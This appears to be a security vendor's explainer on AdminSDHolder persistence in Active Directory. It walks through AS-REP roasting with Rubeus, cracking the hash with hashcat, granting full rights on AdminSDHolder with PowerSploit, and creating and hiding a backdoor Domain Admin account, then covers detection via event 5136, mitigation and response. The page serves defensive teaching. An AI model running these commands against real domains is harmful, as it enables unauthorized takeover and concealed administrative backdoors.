Overview
AdminSDHolder Modification is a persistence technique in which an attacker abuses the SDProp process in Active Directory to establish a persistent backdoor to Active Directory. Each hour (by default), SDProp compares the permissions on protected objects (e.g. the Domain Admins group) in Active Directory with those defined on a special container called AdminSDHolder. If they differ, it replaces the permissions on the protected object with those defined on AdminSDHolder. An adversary who modifies the AdminSDHolder container can establish a path of shadow administration and a means to regain administrative access to Active Directory.
How It Works
Diagram
Video Tutorial
Step 1 - Acquires required privileges
Before an adversary is able to modify the AdminSDHolder container, they must gain administrative privilege in the domain. In this example, the adversary utilizes a tool like Rubeus to AS-REP roast a privileged user with Kerberos pre-authentication disabled.
Code
PS> .\Rubeus.exe asreproast /outfile:hashes.txt /format:hashcat
[*] Action: AS-REP roasting
[*] Target Domain : domain.com
[*] Target DC : dc1
[*] Searching path 'LDAP://dc1/DC=domain,DC=com' for AS-REP roastable users
[*] SamAccountName : joed
[*] DistinguishedName : CN=Joe Dibley,OU=Users,OU=Admin,DC=domain,DC=com
[*] Using domain controller: dc1 (10.154.201.1)
[*] Building AS-REQ (w/o preauth) for: 'domain.com\joed'
[+] AS-REQ w/o preauth successful!
[*] Hash written to c:\Tools\Ghostpack\dotnet v4.5 compiled binaries\hashes.txt
[*] Roasted hashes written to : c:\Tools\Ghostpack\dotnet v4.5 compiled binaries\hashes.txt
PS> .\hashcat.exe -m 18200 -o cracked.txt -a 0 .\Hash.txt .\wordlist.txt
...
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: $krb5asrep$23$joed@domain.com:e7d1f...2ac95c
Time.Started.....: Thu Jul 23 18:58:36 2020 (0 secs)
Time.Estimated...: Thu Jul 23 18:58:36 2020 (0 secs)
Guess.Base.......: File (.\wordlist.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 97694 H/s (0.26ms) @ Accel:256 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests
Progress.........: 100/100 (100.00%)
Rejected.........: 0/100 (0.00%)
Restore.Point....: 0/100 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: 123456 -> taylor
Hardware.Mon.#1..: Temp: 47c Fan: 34% Util: 32% Core:1265MHz Mem:2504MHz Bus:16
PS> Get-Content .\cracked.txt
$krb5asrep$23$joed@domain.com:e7d1f86a67ca41137f9a0b45d24f5795$3f8e0e7a0d8055d91a3fa2c67b537949e7dc30f41b797e01fa459d774d0c10c3fbc2488c7bb634db93118bb5a8dfe99107899f56e2542d39fef9b27d893fbaa5e92acd207b059b548d456f9daa18b24f0c9e83af16898eec8e9dbde3128772924a3f10e09cd66fbede311b3c3a4aa45d9feb6c49178dbab65dd8e38af89b3ac0fad7bde16b0bb50e25c8f6f92d29d5d3a9dc8e633e31db73dd06aa2e2a5e97053f73fada97564248d048fc74b7e13d56016210e6a3d1f4e4c7cafb60007bec16d682b3fd210bdaa1d2f3d44c717f19cf1583e814d92ace43991d132be1897ebeaa8b78daa7b29f1a3e03301c3920da1cf9bd8a887a92fc79280734e5acb2fadcfa05895f0f2ac95c:P@ssword!23
# domain\joed has a password of: P@ssword!23
Step 2 - Modifies AdminSDHolder’s ACL
After successfully cracking the password hash obtained through AS-REP roasting, the adversary authenticates with the password and uses PowerSploit’s Add-DomainObjectACL cmdlet to grant all privileges on the AdminSDHolder container to a normal user they’d previously compromised. The next time the SDProp process runs, BobT’s new privileges will be applied to all protected objects.
Code
PS> runas /noprofile /user:domain\joed powershell.exe
# --- New Window Opens --- #
PS> Import-Module .\PowerSploit.psd1
PS> Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System' -PrincipalIdentity BobT -Rights All
PS> # Confirming Permissions Added
PS> Get-DomainObjectAcl -Identity `CN=AdminSDHolder,CN=System` -ResolveGUIDs
InheritedObjectType : All
ObjectDN : CN=AdminSDHolder,CN=System,DC=Domain,DC=com
ObjectType : All
IdentityReference : Domain\BobT
IsInherited : False
ActiveDirectoryRights : GenericAll
PropagationFlags : None
ObjectFlags : None
InheritanceFlags : None
InheritanceType : None
AccessControlType : Allow
ObjectSID :
Step 3 - Uses permissions to regain access
At this stage the adversary has control of the JoeD and BobT accounts, and has created a persistence mechanism that will allow them to regain Domain Admins privileges if they lose access to JoeD. BobT is, in effect, a shadow administrator of the Active Directory domain.
In this example, the adversary has lost access to JoeD’s account. Instead of having to AS-REP roast again (perhaps pre-authentication was enabled!) or use some other method, the attacker can use BobT’s account to reestablish their position.
Code
PS> Add-ADGroupMember -Identity "Domain Admins" -Members BobT
PS> # Re-authenticate as User1 to get updated group membership or if no password then wait until user re-autenticates
PS> runas.exe /user:domain\BobT powershell
PS> New-ADOrganizationalUnit -Path "DC=domain,DC=com" -Name "Users"
PS> New-ADUser -AccountPassword (ConvertTo-SecureString -AsPlainText -Force -String "MySimplePassword123!") -SamAccountName PaulaS -Name "Paula Smith" -DisplayName "Paula Smith" -EmailAddress "Paula.Smith@domain.com" -PasswordNeverExpires $True -Path "OU=Users,DC=domain,DC=com"
PS> Add-ADGroupMember -Identity "Domain Admins" -Members PaulaS
PS> # Hide the PaulaS and Users OU
PS> Import-Module RACE.psm1
PS> Set-ADACL -SamAccountName Everyone -Right ReadProperty -Type Deny -DistinguishedName (Get-ADUser PaulaS)
PS> Set-ADACL -SAMAccountName Everyone -Right ListChildren -Type Deny -DistinguishedName "OU=Users,DC=domain,DC=com"
PS> # Remove BobT from Domain Admins to hide privileges
PS> Remove-ADGroupMember -Identity "Domain Admins" -Members BobT
PC>
Detect
Watching for changes to the AdminSDHolder container ACL is a good way to detect potential malicious activity. In a normal environment, changes to AdminSDHolder should occur infrequently and follow change control processes. Event ID 5136 in the Audit Directory Service Changes subcategory of the Windows event log monitors directory service changes. To identify changes to the AdminSDHolder container ACL, monitor events which match the ObjectDN “CN=AdminSDHolder,DC=System” and the AttributeLDAPDisplayName is ‘nTSecurityDescriptor’.
The following XPath filter can be used in the Windows Event Viewer to detect modifications to the AdminSDHolder container ACL.
<QueryList>
<Query Id="0" Path="Security">
<Select Path="Security">
*[System[(EventID=5136)]]
and
*[EventData[Data[@Name='ObjectDN'] and (Data='CN=AdminSDHolder,CN=System,DC=YourDomain,DC=com')]]
and
*[EventData[Data[@Name='AttributeLDAPDisplayName'] and (Data='nTSecurityDescriptor')]]
</Select>
</Query>
</QueryList>
Once you find a matching event, the AttributeValue can be decoded from its native SDDL format to human readable using PowerShell’s ConvertFrom-SddlString cmdlet.
$ACL = ConvertFrom-SddlString -Sddl "O:DAG:DAD:PAI(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-5840559-2756745051-1363507867-1127)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-5840559-2756745051-1363507867-1129)(OA;;RPWP;bf967a7f-0de6-11d0-a285-00aa003049e2;;CA)(OA;;RP;46a9b11d-60ae-405a-b7e8-ff8a58d456d2;;S-1-5-32-560)(OA;;RPWP;6db69a1c-9422-11d1-aebd-0000f80367c1;;S-1-5-32-561)(OA;;RPWP;5805bc62-bdc9-4428-a5e2-856a0f4c185e;;S-1-5-32-561)(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;WD)(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;PS)(OA;CI;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;LCRPRC;;;S-1-5-21-5840559-2756745051-1363507867-4102)(A;;RPWP;;;S-1-5-21-5840559-2756745051-1363507867-1127)(A;;RPWP;;;S-1-5-21-5840559-2756745051-1363507867-1129)(A;;CCDCLCSWRPWPLOCRRCWDWO;;;DA)(A;;CCDCLCSWRPWPLOCRRCWDWO;;;S-1-5-21-5840559-2756745051-1363507867-519)(A;;LCRPLORC;;;RU)(A;;CCDCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:AI(AU;SA;WPWDWO;;;WD)(OU;CIIOIDSA;LCRPRC;;bf967aae-0de6-11d0-a285-00aa003049e2;WD)(OU;CIIDSA;CR;89e95b76-444d-4c62-991a-0facbeda640c;;DU)(OU;CIIDSA;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;DU)(OU;CIIDSA;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DU)(OU;CIIOIDSA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CIIOIDSA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;CIIDSA;LCRPWPRC;;;DU)"
$ACL.DiscretionaryACL
# --- Output Truncated --- #
Domain\BobT: AccessAllowed (ChangePermissions, CreateDirectories, Delete, DeleteSubdirectoriesAndFiles, ExecuteKey, FullControl, GenericAll, GenericExecute, GenericRead, GenericWrite, ListDirectory, Modify, Read, ReadAndExecute, ReadAttributes, ReadExtendedAttributes, ReadPermissions, TakeOwnership, Traverse, Write, WriteAttributes, WriteData, WriteExtendedAttributes, WriteKey)
# --- Output Truncated --- #
Mitigate
The AdminSDHolder container is a core part of Active Directory. By default, only users with administrative privileges in Active Directory are able to modify its ACL. To mitigate the risk of unauthorized modification:
- Routinely audit AdminSDHolder permissions for unauthorized or unnecessary permissions.
- Do not allow users to possess administrative privileges across security boundaries. For example, an adversary who initially compromises a workstation should not be able to escalate privileges to move from the workstation to a server or domain controller. Eliminating these pathways to privilege escalation is essential.
- Aggressively embrace the principal of least privilege.
Respond
If unauthorized permissions are granted on the AdminSDHolder container, the following actions can be taken to respond:
- Activate the incident response process and alert the response team
- Remove the newly added ACL; if done before the
SDPropprocess runs (by default every 60 minutes) no new permissions on protected objects would be propagated - Reset the password of the user that performed the unauthorized modification of the AdminSDHolder container ACL. Optionally disable the user to a) force instantaneous replication to all domain controllers, and b) disrupt the adversary’s use of that account
- Quarantine the impacted machines for forensic investigation, as well as eradication and recovery activities
Additional Resources
Further Reading
- Sneaky Active Directory Persistence #15: Leverage AdminSDHolder & SDProp to (Re)Gain Domain Admin Rights
- Abusing Active Directory Permissions with PowerView